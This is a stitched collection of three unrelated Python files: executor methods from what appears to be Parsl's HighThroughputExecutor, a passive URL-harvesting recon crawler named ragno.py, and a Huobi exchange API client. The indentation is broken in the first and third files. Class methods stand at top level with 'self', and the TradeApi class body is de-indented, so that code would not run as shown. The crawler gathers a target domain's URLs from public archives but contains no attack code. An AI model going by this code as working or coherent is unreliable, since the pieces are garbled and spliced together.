    self.mem_per_worker = mem_per_worker
    self.max_workers = max_workers
    self.prefetch_capacity = prefetch_capacity

    # Derive a per-node worker cap from provider hints (memory and cores);
    # each hint that is unavailable leaves the corresponding slot count at
    # max_workers so it does not constrain the minimum below.
    mem_slots = max_workers
    cpu_slots = max_workers
    if hasattr(self.provider, 'mem_per_node') and \
            self.provider.mem_per_node is not None and \
            mem_per_worker is not None and \
            mem_per_worker > 0:
        mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
    if hasattr(self.provider, 'cores_per_node') and \
            self.provider.cores_per_node is not None:
        cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)

    self.workers_per_node = min(max_workers, mem_slots, cpu_slots)
    if self.workers_per_node == float('inf'):
        self.workers_per_node = 1  # our best guess-- we do not have any provider hints

    self._task_counter = 0
    self.address = address
    self.hub_address = None  # set to the correct hub address in dfk
    self.hub_port = None  # set to the correct hub port in dfk
    self.worker_ports = worker_ports
    self.worker_port_range = worker_port_range
    self.interchange_port_range = interchange_port_range
    self.heartbeat_threshold = heartbeat_threshold
    self.heartbeat_period = heartbeat_period
    self.poll_period = poll_period
    self.suppress_failure = suppress_failure
    self.run_dir = '.'
    self.worker_logdir_root = worker_logdir_root

    # Default worker-pool launch command. {block_id} is doubly braced so it
    # survives the first .format() in initialize_scaling and is filled in
    # per block by scale_out.
    if not launch_cmd:
        self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
                           "-p {prefetch_capacity} "
                           "-c {cores_per_worker} "
                           "-m {mem_per_worker} "
                           "--poll {poll_period} "
                           "--task_url={task_url} "
                           "--result_url={result_url} "
                           "--logdir={logdir} "
                           "--block_id={{block_id}} "
                           "--hb_period={heartbeat_period} "
                           "--hb_threshold={heartbeat_threshold} ")
def initialize_scaling(self):
    """Compose the worker launch command and scale out the initial blocks.

    Fills every placeholder of ``self.launch_cmd`` except ``{block_id}``,
    which is supplied per block by ``scale_out``.
    """
    debug_opts = "--debug" if self.worker_debug else ""
    # The flag is omitted entirely when the worker count is unbounded.
    max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)

    # Worker logs default under run_dir but can be redirected, e.g. onto a
    # filesystem that is reachable from remote compute nodes.
    worker_logdir = "{}/{}".format(self.run_dir, self.label)
    if self.worker_logdir_root is not None:
        worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)

    l_cmd = self.launch_cmd.format(debug=debug_opts,
                                   prefetch_capacity=self.prefetch_capacity,
                                   task_url=self.worker_task_url,
                                   result_url=self.worker_result_url,
                                   cores_per_worker=self.cores_per_worker,
                                   mem_per_worker=self.mem_per_worker,
                                   max_workers=max_workers,
                                   nodes_per_block=self.provider.nodes_per_block,
                                   heartbeat_period=self.heartbeat_period,
                                   heartbeat_threshold=self.heartbeat_threshold,
                                   poll_period=self.poll_period,
                                   logdir=worker_logdir)
    self.launch_cmd = l_cmd
    logger.debug("Launch command: {}".format(self.launch_cmd))

    self._scaling_enabled = self.provider.scaling_enabled
    logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
    if hasattr(self.provider, 'init_blocks'):
        try:
            self.scale_out(blocks=self.provider.init_blocks)
        except Exception as e:
            logger.error("Scaling out failed: {}".format(e))
            raise e
def start(self):
    """Create the Interchange process and connect to it.
    """
    # Client-side ZMQ pipes; the interchange runs on this host, so loopback.
    self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
    self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
    self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)

    self.is_alive = True

    self._executor_bad_state = threading.Event()
    self._executor_exception = None
    self._queue_management_thread = None
    self._start_queue_management_thread()
    self._start_local_queue_process()

    logger.debug("Created management thread: {}".format(self._queue_management_thread))

    if self.provider:
        self.initialize_scaling()
    else:
        self._scaling_enabled = False
        logger.debug("Starting HighThroughputExecutor with no provider")
def _queue_management_worker(self):
    """Listen to the queue for task status messages and handle them.

    Depending on the message, tasks will be updated with results, exceptions,
    or updates. It expects the following messages:

    .. code:: python

        {
           "task_id" : <task_id>
           "result"  : serialized result object, if task succeeded
           ... more tags could be added later
        }

        {
           "task_id" : <task_id>
           "exception" : serialized exception object, on failure
        }

    We do not support these yet, but they could be added easily.

    .. code:: python

        {
           "task_id" : <task_id>
           "cpu_stat" : <>
           "mem_stat" : <>
           "io_stat"  : <>
           "started"  : tstamp
        }

    The `None` message is a die request.
    """
    logger.debug("[MTHREAD] queue management worker starting")

    while not self._executor_bad_state.is_set():
        try:
            msgs = self.incoming_q.get(timeout=1)
            # logger.debug("[MTHREAD] get has returned {}".format(len(msgs)))

        except queue.Empty:
            logger.debug("[MTHREAD] queue empty")
            # Timed out.
            pass

        except IOError as e:
            logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
            return

        except Exception as e:
            logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
            return

        else:
            if msgs is None:
                logger.debug("[MTHREAD] Got None, exiting")
                return

            else:
                for serialized_msg in msgs:
                    try:
                        msg = pickle.loads(serialized_msg)
                        tid = msg['task_id']
                    except pickle.UnpicklingError:
                        raise BadMessage("Message received could not be unpickled")

                    except Exception:
                        raise BadMessage("Message received does not contain 'task_id' field")

                    # A task_id of -1 is the interchange reporting a fatal
                    # error rather than a per-task outcome.
                    if tid == -1 and 'exception' in msg:
                        logger.warning("Executor shutting down due to exception from interchange")
                        self._executor_exception, _ = deserialize_object(msg['exception'])
                        logger.exception("Exception: {}".format(self._executor_exception))
                        # Set bad state to prevent new tasks from being submitted
                        self._executor_bad_state.set()

                        # We set all current tasks to this exception to make sure that
                        # this is raised in the main context.
                        for task in self.tasks:
                            self.tasks[task].set_exception(self._executor_exception)
                        break

                    task_fut = self.tasks[tid]

                    if 'result' in msg:
                        result, _ = deserialize_object(msg['result'])
                        task_fut.set_result(result)

                    elif 'exception' in msg:
                        try:
                            s, _ = deserialize_object(msg['exception'])
                            # s should be a RemoteExceptionWrapper... so we can reraise it
                            if isinstance(s, RemoteExceptionWrapper):
                                try:
                                    s.reraise()
                                except Exception as e:
                                    task_fut.set_exception(e)
                            elif isinstance(s, Exception):
                                task_fut.set_exception(s)
                            else:
                                raise ValueError("Unknown exception-like type received: {}".format(type(s)))
                        except Exception as e:
                            # TODO could be a proper wrapped exception?
                            task_fut.set_exception(
                                DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
                    else:
                        raise BadMessage("Message received is neither result or exception")

        if not self.is_alive:
            break

    logger.info("[MTHREAD] queue management worker finished")
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
    """We do not use this yet."""
    # Waking the management thread with the None "die request" message.
    q.put(None)
def _start_local_queue_process(self):
    """ Starts the interchange process locally

    Starts the interchange process locally and uses an internal command queue to
    get the worker task and result ports that the interchange has bound to.
    """
    comm_q = Queue(maxsize=10)
    self.queue_proc = Process(target=interchange.starter,
                              args=(comm_q,),
                              kwargs={"client_ports": (self.outgoing_q.port,
                                                       self.incoming_q.port,
                                                       self.command_client.port),
                                      "worker_ports": self.worker_ports,
                                      "worker_port_range": self.worker_port_range,
                                      "hub_address": self.hub_address,
                                      "hub_port": self.hub_port,
                                      "logdir": "{}/{}".format(self.run_dir, self.label),
                                      "suppress_failure": self.suppress_failure,
                                      "heartbeat_threshold": self.heartbeat_threshold,
                                      "poll_period": self.poll_period,
                                      "logging_level": logging.DEBUG if self.worker_debug else logging.INFO
                                      },
                              )
    self.queue_proc.start()
    # The interchange reports back the two worker-facing ports it bound to;
    # give it up to 120s before declaring startup failed.
    try:
        (worker_task_port, worker_result_port) = comm_q.get(block=True, timeout=120)
    except queue.Empty:
        logger.error("Interchange has not completed initialization in 120s. Aborting")
        raise Exception("Interchange failed to start")

    self.worker_task_url = "tcp://{}:{}".format(self.address, worker_task_port)
    self.worker_result_url = "tcp://{}:{}".format(self.address, worker_result_port)
def _start_queue_management_thread(self):
    """Start the queue management thread as a daemon, unless one exists.

    Could later serve as a restart hook should the management thread die.
    """
    if self._queue_management_thread is not None:
        logger.debug("Management thread already exists, returning")
        return

    logger.debug("Starting queue management thread")
    qm_thread = threading.Thread(target=self._queue_management_worker)
    qm_thread.daemon = True
    self._queue_management_thread = qm_thread
    qm_thread.start()
    logger.debug("Started queue management thread")
def hold_worker(self, worker_id):
    """Ask the interchange to stop scheduling new tasks onto a worker.

    Called "hold" because only scheduling stops; the worker itself is
    not killed.

    Parameters
    ----------
    worker_id : str
        Worker id to be put on hold
    """
    reply = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
    logger.debug("Sent hold request to worker: {}".format(worker_id))
    return reply
@property
def outstanding(self):
    """Number of tasks not yet completed, as reported by the interchange."""
    return self.command_client.run("OUTSTANDING_C")
@property
def connected_workers(self):
    """Workers currently connected, as reported by the interchange."""
    return self.command_client.run("WORKERS")
@property
def connected_managers(self):
    """Managers currently connected, as reported by the interchange."""
    return self.command_client.run("MANAGERS")
def _hold_block(self, block_id):
    """Send a hold command to every manager belonging to one block.

    Parameters
    ----------
    block_id : str
        Block identifier of the block to be put on hold
    """
    for mgr in self.connected_managers:
        if mgr['block_id'] != block_id:
            continue
        logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(mgr['manager']))
        self.hold_worker(mgr['manager'])
def submit(self, func, *args, **kwargs):
    """Submit work to the outgoing_q.

    The outgoing_q is watched by an external process that listens on this
    queue for new work. This method behaves like a
    submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_

    Args:
        - func (callable) : Callable function
        - *args (list) : List of arbitrary positional arguments.

    Kwargs:
        - **kwargs (dict) : A dictionary of arbitrary keyword args for func.

    Returns:
        Future

    Raises:
        The stored executor exception, if the executor entered a bad state.
    """
    if self._executor_bad_state.is_set():
        raise self._executor_exception

    self._task_counter += 1
    task_id = self._task_counter

    # Handle people sending blobs gracefully: truncate huge reprs, but only
    # pay for repr() when debug logging is actually enabled. The original
    # test (getEffectiveLevel() >= logging.DEBUG) was inverted and computed
    # the truncated reprs at every log level.
    args_to_print = args
    if logger.isEnabledFor(logging.DEBUG):
        args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
    logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))

    self.tasks[task_id] = Future()

    fn_buf = pack_apply_message(func, args, kwargs,
                                buffer_threshold=1024 * 1024,
                                item_threshold=1024)

    msg = {"task_id": task_id,
           "buffer": fn_buf}

    # Post task to the outgoing queue
    self.outgoing_q.put(msg)

    # Return the future
    return self.tasks[task_id]
@property
def scaling_enabled(self):
    # Set from the provider in initialize_scaling, or False when no provider.
    return self._scaling_enabled
def scale_out(self, blocks=1):
    """Scale out the number of active blocks by the requested amount.

    Parameters
    ----------
    blocks : int
        Number of blocks to provision via the provider.

    Returns
    -------
    list of str or None
        External ids of the newly provisioned blocks, or None when no
        execution provider is available.

    Raises
    ------
    ScalingFailed
        If the provider fails to provision nodes for a block.
        (The original docstring wrongly claimed NotImplementedError.)
    """
    if not self.provider:
        # Log once instead of once per requested block.
        logger.error("No execution provider available")
        return None

    launched = []
    for _ in range(blocks):
        external_block_id = str(len(self.blocks))
        launch_cmd = self.launch_cmd.format(block_id=external_block_id)
        internal_block = self.provider.submit(launch_cmd, 1)
        logger.debug("Launched block {}->{}".format(external_block_id, internal_block))
        if not internal_block:
            raise ScalingFailed(self.provider.label,
                                "Attempts to provision nodes via provider has failed")
        launched.append(external_block_id)
        self.blocks[external_block_id] = internal_block
    return launched
def scale_in(self, blocks=None, block_ids=None):
    """Scale in the number of active blocks by the specified amount.

    The scale in method here is very rude. It doesn't give the workers
    the opportunity to finish current tasks or cleanup. This is tracked
    in issue #530.

    Parameters
    ----------
    blocks : int
        Number of blocks to terminate and scale_in by
    block_ids : list
        List of specific block ids to terminate. Optional.
        (The default is now None instead of a shared mutable [] literal;
        behavior is unchanged for all callers.)

    Returns
    -------
    The provider's cancel() result, or None when no provider is available.
    """
    if block_ids:
        block_ids_to_kill = block_ids
    else:
        block_ids_to_kill = list(self.blocks.keys())[:blocks]

    # Hold the block so no new tasks are scheduled onto it.
    for block_id in block_ids_to_kill:
        self._hold_block(block_id)

    # Now kill via provider.
    to_kill = [self.blocks.pop(bid) for bid in block_ids_to_kill]
    if self.provider:
        return self.provider.cancel(to_kill)
    # Previously this path raised an unbound-local NameError on `r`.
    return None
def status(self):
    """Return status of all blocks."""
    if not self.provider:
        return []
    return self.provider.status(list(self.blocks.values()))
def shutdown(self, hub=True, targets='all', block=False):
    """Shutdown the executor by terminating the interchange process.

    The keyword arguments are currently accepted but not acted upon.

    Kwargs:
        - hub (Bool): Whether the hub should be shutdown, Default:True,
        - targets (list of ints| 'all'): List of block id's to kill, Default:'all'
        - block (Bool): To block for confirmations or not

    Returns:
        True
    """
    logger.info("Attempting HighThroughputExecutor shutdown")
    # self.outgoing_q.close()
    # self.incoming_q.close()
    self.queue_proc.terminate()
    logger.info("Finished HighThroughputExecutor shutdown attempt")
    return True
|
ragno.py |
import subprocess
import requests
import argparse
import numpy as np
import threading
# ANSI escape codes used to color terminal output.
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'

"""
Crawl Source:
=============
1. web.archive.org
2. index.commoncrawl.org
3. otx.alienvault.com
"""
def get_arguments():
    """Parse and return the crawler's command-line arguments."""
    parser = argparse.ArgumentParser(description=f'{RED} Ragno v1.0')
    parser._optionals.title = f"{GREEN}Optional Arguments{YELLOW}"
    parser.add_argument("-o", "--output", dest="output", help="Save Result in TXT file")
    parser.add_argument("-s", "--subs", dest="want_subdomain", help="Include Result of Subdomains", action='store_true')
    parser.add_argument("-q", "--quiet", dest="quiet", help="Run Scan Without printing URLs on screen", action='store_true')
    parser.add_argument("--deepcrawl", dest="deepcrawl", help=f"Uses All Available APIs of CommonCrawl for Crawling URLs [{WHITE}Takes Time{YELLOW}]", action='store_true')
    # Fix: type=int so a user-supplied -t value arrives as an int like the
    # default does, instead of as a string.
    parser.add_argument("-t", "--thread", dest="thread", help=f"Number of Threads to Used. Default=50 [{WHITE}Use When deepcrawl is Enabled{YELLOW}]", type=int, default=50)
    required_arguments = parser.add_argument_group(f'{RED}Required Arguments{GREEN}')
    required_arguments.add_argument("-d", "--domain", dest="domain", help="Target Domain Name, ex:- google.com")
    return parser.parse_args()
class PassiveCrawl:
    """Collect URLs for a target domain from passive (no-touch) sources:
    web.archive.org, index.commoncrawl.org and otx.alienvault.com.
    """

    def __init__(self, domain, want_subdomain, threadNumber, deepcrawl):
        """
        Parameters
        ----------
        domain : str
            Target domain name, e.g. "google.com".
        want_subdomain : bool
            Include subdomain results.
        threadNumber : int or str
            Number of threads used by the deep CommonCrawl scan.
        deepcrawl : bool
            Query every available CommonCrawl API (slow).
        """
        self.domain = domain
        self.want_subdomain = want_subdomain
        self.deepcrawl = deepcrawl
        self.threadNumber = threadNumber
        self.final_url_list = []

    def start(self):
        """Run the crawl over all sources and return a de-duplicated URL list."""
        if self.deepcrawl:
            self.startDeepCommonCrawl()
        else:
            self.getCommonCrawlURLs(self.domain, self.want_subdomain,
                                    ["http://index.commoncrawl.org/CC-MAIN-2018-22-index"])
        self.final_url_list.extend(self.getWaybackURLs(self.domain, self.want_subdomain))
        self.final_url_list.extend(self.getOTX_URLs(self.domain))

        # dict.fromkeys preserves insertion order while dropping duplicates.
        self.final_url_list = list(dict.fromkeys(self.final_url_list))
        return self.final_url_list

    def getIdealDomain(self, domainName):
        """Strip the scheme, slashes and a leading "www." from a domain name.

        Fix: the original removed the substring "www" *anywhere* in the
        name and left the following dot, turning "www.google.com" into
        ".google.com" and mangling names that merely contain "www".
        """
        final_domain = domainName.replace("http://", "").replace("https://", "").replace("/", "")
        if final_domain.startswith("www."):
            final_domain = final_domain[len("www."):]
        return final_domain

    def split_list(self, list_name, total_part_num):
        """Split a Python list into ``total_part_num`` near-equal sublists."""
        return [list(chunk) for chunk in np.array_split(list_name, total_part_num)]

    def make_GET_Request(self, url, response_type):
        """GET ``url`` and return the body parsed as JSON or as raw text.

        A timeout keeps a dead source from hanging the whole crawl.
        """
        response = requests.get(url, timeout=30)
        if response_type.lower() == "json":
            return response.json()
        return response.text

    def getWaybackURLs(self, domain, want_subdomain):
        """Fetch archived URLs for the domain from the Wayback CDX API."""
        wild_card = "*." if want_subdomain else ""
        url = f"http://web.archive.org/cdx/search/cdx?url={wild_card+domain}/*&output=json&collapse=urlkey&fl=original"
        urls_list = self.make_GET_Request(url, "json")
        # The first row is the CDX column header; an empty result has no rows.
        if urls_list:
            urls_list.pop(0)
        return [row[0] for row in urls_list]

    def getOTX_URLs(self, domain):
        """Fetch known URLs for the domain from AlienVault OTX."""
        url = f"https://otx.alienvault.com/api/v1/indicators/hostname/{domain}/url_list"
        raw_urls = self.make_GET_Request(url, "json")
        # .get guards against a response without a "url_list" key.
        return [entry["url"] for entry in raw_urls.get("url_list", [])]

    def startDeepCommonCrawl(self):
        """Spread every CommonCrawl index API over ``threadNumber`` threads."""
        api_list = self.get_all_api_CommonCrawl()
        collection_of_api_list = self.split_list(api_list, int(self.threadNumber))

        thread_list = [
            threading.Thread(target=self.getCommonCrawlURLs,
                             args=(self.domain, self.want_subdomain, sub_list))
            for sub_list in collection_of_api_list
        ]
        for thread in thread_list:
            thread.start()
        for thread in thread_list:
            thread.join()

    def get_all_api_CommonCrawl(self):
        """Return the cdx-api endpoint of every published CommonCrawl index."""
        raw_api = self.make_GET_Request("http://index.commoncrawl.org/collinfo.json", "json")
        return [item["cdx-api"] for item in raw_api]

    def getCommonCrawlURLs(self, domain, want_subdomain, apiList):
        """Collect URLs for the domain from the given CommonCrawl index APIs.

        Results are appended to ``self.final_url_list``: the method doubles
        as a thread target, so it reports through shared state rather than
        a return value.
        """
        wild_card = "*." if want_subdomain else ""
        for api in apiList:
            url = f"{api}?url={wild_card+domain}/*&fl=url"
            raw_urls = self.make_GET_Request(url, "text")
            # An HTML page or a "No Captures found" body means no results.
            if ("No Captures found for:" in raw_urls) or ("<title>" in raw_urls):
                continue
            # Extend with one pre-built list per API response so concurrent
            # worker threads interleave whole batches, not single items.
            self.final_url_list.extend([u for u in raw_urls.split("\n") if u != ""])
if __name__ == '__main__':
    arguments = get_arguments()

    # Build the crawler and gather URLs from all passive sources.
    crawl = PassiveCrawl(arguments.domain, arguments.want_subdomain,
                         arguments.thread, arguments.deepcrawl)
    final_url_list = crawl.start()

    def save_urls(path):
        # Persist one URL per line.
        with open(path, "w", encoding="utf-8") as f:
            for url in final_url_list:
                f.write(url + "\n")

    if arguments.quiet:
        # Quiet mode: only write results, to -o or to <domain>.txt.
        save_urls(arguments.output if arguments.output else arguments.domain + ".txt")
    else:
        for url in final_url_list:
            print(url)
        print("[>> Total URLs] : ", len(final_url_list))
        if arguments.output:
            save_urls(arguments.output)
|
vnhuobi.py | # encoding: utf-8
import urllib
import hashlib
import gzip
import zlib
import json
import requests
from time import time, sleep
from Queue import Queue, Empty
from threading import Thread
import websocket
# Constant definitions
COINTYPE_BTC = 1
COINTYPE_LTC = 2

ACCOUNTTYPE_CNY = 1
ACCOUNTTYPE_USD = 2

LOANTYPE_CNY = 1
LOANTYPE_BTC = 2
LOANTYPE_LTC = 3
LOANTYPE_USD = 4

# MARKETTYPE_CNY = 'cny'
MARKETTYPE_USD = 'usd'

SYMBOL_BTC_USDT = 'btcusdt'
SYMBOL_LTC_USDT = 'ltcusdt'
SYMBOL_BTCUSD = 'BTC_USD'

# K-line period codes used by the market API
PERIOD_1MIN = '001'
PERIOD_5MIN = '005'
PERIOD_15MIN = '015'
PERIOD_30MIN = '030'
PERIOD_60MIN = '060'
PERIOD_DAILY = '100'
PERIOD_WEEKLY = '200'
PERIOD_MONTHLY = '300'
PERIOD_ANNUALLY = '400'

# API endpoint definitions
HUOBI_MARKET_API = 'wss://api.huobi.pro/ws'
HUOBI_TRADE_API = 'https://api.huobi.pro/v1'

# Function codes (legacy trade-API method names)
FUNCTIONCODE_GETACCOUNTINFO = 'get_account_info'
FUNCTIONCODE_GETORDERS = 'get_orders'
FUNCTIONCODE_ORDERINFO = 'order_info'
FUNCTIONCODE_BUY = 'buy'
FUNCTIONCODE_SELL = 'sell'
FUNCTIONCODE_BUYMARKET = 'buy_market'
FUNCTIONCODE_SELLMARKET = 'sell_market'
FUNCTIONCODE_CANCELORDER = 'cancel_order'
FUNCTIONCODE_GETNEWDEALORDERS = 'get_new_deal_orders'
FUNCTIONCODE_GETORDERIDBYTRADEID = 'get_order_id_by_trade_id'
FUNCTIONCODE_WITHDRAWCOIN = 'withdraw_coin'
FUNCTIONCODE_CANCELWITHDRAWCOIN = 'cancel_withdraw_coin'
FUNCTIONCODE_GETWITHDRAWCOINRESULT = 'get_withdraw_coin_result'
FUNCTIONCODE_TRANSFER = 'transfer'
FUNCTIONCODE_LOAN = 'loan'
FUNCTIONCODE_REPAYMENT = 'repayment'
FUNCTIONCODE_GETLOANAVAILABLE = 'get_loan_available'
FUNCTIONCODE_GETLOANS = 'get_loans'
def signature(params):
    """Build the MD5 request signature over the sorted parameters.

    NOTE: Python 2 code (dict.iteritems / urllib.urlencode).
    """
    # Sort by key so the signed string is deterministic.
    params = sorted(params.iteritems(), key=lambda d: d[0], reverse=False)
    message = urllib.urlencode(params)

    m = hashlib.md5()
    m.update(message)
    # Fix: the original also called m.digest() here and discarded the
    # result; the dead call is removed.
    sig = m.hexdigest()
    return sig
import logging

# Install a default handler so library loggers produce visible output.
logging.basicConfig()


#######################################################################
class HuoBiMarketApi(object):
    """Huobi market-data interface (websocket push)."""

    def readData(self, evt):
        """Decompress a pushed gzip frame and parse the JSON payload.

        Server pings are answered with the matching pong before parsing.
        """
        # wbits = 16 + MAX_WBITS: expect a gzip (not raw zlib) wrapper.
        # (The original reached zlib through gzip.zlib; use zlib directly.)
        decompress = zlib.decompressobj(16 + zlib.MAX_WBITS)

        # Fix: decode only after flush() is concatenated. The original added
        # a decoded str to the bytes from flush(), which is a TypeError on
        # Python 3 and could drop trailing bytes.
        result = (decompress.decompress(evt) + decompress.flush()).decode('utf-8')

        # Heartbeat: {"ping": <13-digit ms timestamp>} -> {"pong": <ts>}
        if result[:7] == '{"ping"':
            ts = result[8:21]
            pong = '{"pong":' + ts + '}'
            self.ws.send(pong)

        # Parse the JSON payload.
        data = json.loads(result)
        return data

    def onMessage(self, ws, evt):
        """Message push callback."""
        print('onMessage')
        data = self.readData(evt)
        print(data)

    def onError(self, ws, evt):
        """Error push callback."""
        print('onError')
        print(evt)

    def onClose(self, ws):
        """Connection closed callback."""
        print('onClose')

    def onOpen(self, ws):
        """Connection opened callback."""
        print('onOpen')

    def _startWebsocket(self, url):
        # Shared by connect/reconnect: build the app and pump it in a thread.
        self.ws = websocket.WebSocketApp(url,
                                         on_message=self.onMessage,
                                         on_error=self.onError,
                                         on_close=self.onClose,
                                         on_open=self.onOpen)
        self.thread = Thread(target=self.ws.run_forever)
        self.thread.start()

    def connect(self, trace=False):
        """Connect to the market websocket endpoint.

        NOTE(review): ``trace`` is accepted but unused -- presumably meant
        for websocket.enableTrace(trace); confirm before wiring it up.
        """
        self._startWebsocket(HUOBI_MARKET_API)

    def reconnect(self):
        """Close the current connection and open a fresh one."""
        # First shut down the previous connection.
        self.close()
        # Fix: the original reconnected to the never-assigned ``self.host``
        # (AttributeError); reconnect to the market endpoint instead.
        self._startWebsocket(HUOBI_MARKET_API)

    def close(self):
        """Close the websocket and join the pump thread."""
        # is_alive() works on Python 2.6+ and 3 (isAlive was removed in 3.9).
        if self.thread and self.thread.is_alive():
            self.ws.close()
            self.thread.join()

    def sendMarketDataRequest(self, req):
        """Send a raw request string, ignoring an already-closed connection."""
        try:
            self.ws.send(req)
        except websocket.WebSocketConnectionClosedException:
            pass

    def subscribeTick(self, symbol):
        """Subscribe to real-time trade detail data."""
        self.sendMarketDataRequest('{"req": "market.%s.detail", "id": "id12"}' % symbol)

    def subscribeQuote(self, symbol):
        """Subscribe to real-time quote data.

        NOTE(review): references self.QUOTE_SYMBOL_URL and self.taskList,
        which are never defined on this class -- looks like leftover code
        from an older polling implementation; confirm before calling.
        """
        url = self.QUOTE_SYMBOL_URL[symbol]
        task = (url, self.onQuote)
        self.taskList.append(task)

    def subscribeDepth(self, symbol, level=0):
        """Subscribe to market depth data.

        Fix: the original used str.format on a literal containing JSON
        braces, which raised KeyError; it also defined this method twice.
        %-formatting matches the sibling subscriptions.
        """
        self.sendMarketDataRequest('{"req": "market.%s.depth.step0", "id": "id1"}' % symbol)

    def subscribeKLine(self, symbol):
        """Subscribe to real-time 1-minute K-line data."""
        self.sendMarketDataRequest('{"req": "market.%s.kline.1min", "id": "id2"}' % symbol)
########################################################################
class TradeApi(object):
"""交易接口"""
DEBUG = True
#----------------------------------------------------------------------
def __init__(self):
    """Constructor"""
    self.accessKey = ''
    self.secretKey = ''

    self.active = False         # API working state
    self.reqID = 0              # request sequence number
    self.reqQueue = Queue()     # request queue
    self.reqThread = Thread(target=self.processQueue)    # request processing thread
#----------------------------------------------------------------------
def processRequest(self, req):
    """Execute one queued request against the trade API.

    Returns the decoded JSON body on HTTP 200, otherwise None.
    """
    # Unpack the method and its parameters.
    method = req['method']
    params = req['params']
    optional = req['optional']

    # Mandatory fields of the legacy signed request. int() replaces the
    # Python-2-only long(); the truncated epoch-seconds value is identical.
    params['created'] = int(time())
    params['access_key'] = self.accessKey
    params['secret_key'] = self.secretKey
    params['method'] = method

    # Sign: the secret key participates in the signature but must not be
    # transmitted, hence the del afterwards.
    sign = signature(params)
    params['sign'] = sign
    del params['secret_key']

    # Merge optional parameters.
    if optional:
        params.update(optional)

    # NOTE(review): the urlencoded payload is passed via ``params`` (query
    # string) rather than ``data`` (POST body) -- confirm this matches the
    # API's expectation before changing it.
    payload = urllib.urlencode(params)
    r = requests.post(HUOBI_TRADE_API, params=payload)
    if r.status_code == 200:
        data = r.json()
        return data
    else:
        return None
#----------------------------------------------------------------------
def processQueue(self):
    """Drain the request queue, dispatching callbacks, until deactivated."""
    while self.active:
        try:
            req = self.reqQueue.get(block=True, timeout=1)  # 1-second blocking get
            callback = req['callback']
            reqID = req['reqID']

            data = self.processRequest(req)

            # Fix: processRequest returns None on a non-200 response and the
            # original then crashed on ``'code' in data``.
            if data is None:
                self.onError(u'HTTP request failed', req, reqID)
            # Request rejected by the API
            elif 'code' in data and 'message' in data:
                error = u'错误信息:%s' % data['message']  # "error message: ..."
                self.onError(error, req, reqID)
            # Request succeeded
            else:
                if self.DEBUG:
                    print(callback.__name__)
                callback(data, req, reqID)
        except Empty:
            pass
#----------------------------------------------------------------------
def sendRequest(self, method, params, callback, optional=None):
    """Queue a request for the worker thread and return its request id."""
    self.reqID += 1

    req = {
        'method': method,
        'params': params,
        'callback': callback,
        'optional': optional,
        'reqID': self.reqID,
    }
    self.reqQueue.put(req)

    return self.reqID
####################################################
## Active (request) methods
####################################################

#----------------------------------------------------------------------
def init(self, accessKey, secretKey):
    """Initialise credentials and start the request-processing thread."""
    self.accessKey = accessKey
    self.secretKey = secretKey
    self.active = True
    self.reqThread.start()
#----------------------------------------------------------------------
def exit(self):
    """Stop the worker loop and join the request thread."""
    self.active = False

    # Fix: is_alive() works on Python 2.6+ and 3; isAlive() was removed
    # in Python 3.9.
    if self.reqThread.is_alive():
        self.reqThread.join()
#----------------------------------------------------------------------
def getAccountInfo(self, market='cny'):
    """Query account information."""
    method = FUNCTIONCODE_GETACCOUNTINFO
    params = {}
    callback = self.onGetAccountInfo
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getOrders(self, coinType=COINTYPE_BTC, market='cny'):
    """Query open orders."""
    method = FUNCTIONCODE_GETORDERS
    params = {'coin_type': coinType}
    callback = self.onGetOrders
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def orderInfo(self, id_, coinType=COINTYPE_BTC, market='cny'):
    """Get details of a single order."""
    method = FUNCTIONCODE_ORDERINFO
    params = {
        'coin_type': coinType,
        'id': id_
    }
    callback = self.onOrderInfo
    optional = {'market': market}
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def buy(self, price, amount, coinType=COINTYPE_BTC,
        tradePassword='', tradeId = '', market='cny'):
    """Place a limit buy order."""
    method = FUNCTIONCODE_BUY
    params = {
        'coin_type': coinType,
        'price': price,
        'amount': amount
    }
    callback = self.onBuy
    optional = {
        'trade_password': tradePassword,
        'trade_id': tradeId,
        'market': market
    }
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def sell(self, price, amount, coinType=COINTYPE_BTC,
         tradePassword='', tradeId = '', market='cny'):
    """Place a limit sell order."""
    method = FUNCTIONCODE_SELL
    params = {
        'coin_type': coinType,
        'price': price,
        'amount': amount
    }
    callback = self.onSell
    optional = {
        'trade_password': tradePassword,
        'trade_id': tradeId,
        'market': market
    }
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def buyMarket(self, amount, coinType=COINTYPE_BTC,
              tradePassword='', tradeId = '', market='cny'):
    """Place a market buy order."""
    method = FUNCTIONCODE_BUYMARKET
    params = {
        'coin_type': coinType,
        'amount': amount
    }
    callback = self.onBuyMarket
    optional = {
        'trade_password': tradePassword,
        'trade_id': tradeId,
        'market': market
    }
    return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def sellMarket(self, amount, coinType=COINTYPE_BTC,
               tradePassword='', tradeId = '', market='cny'):
    """Place a market sell order."""
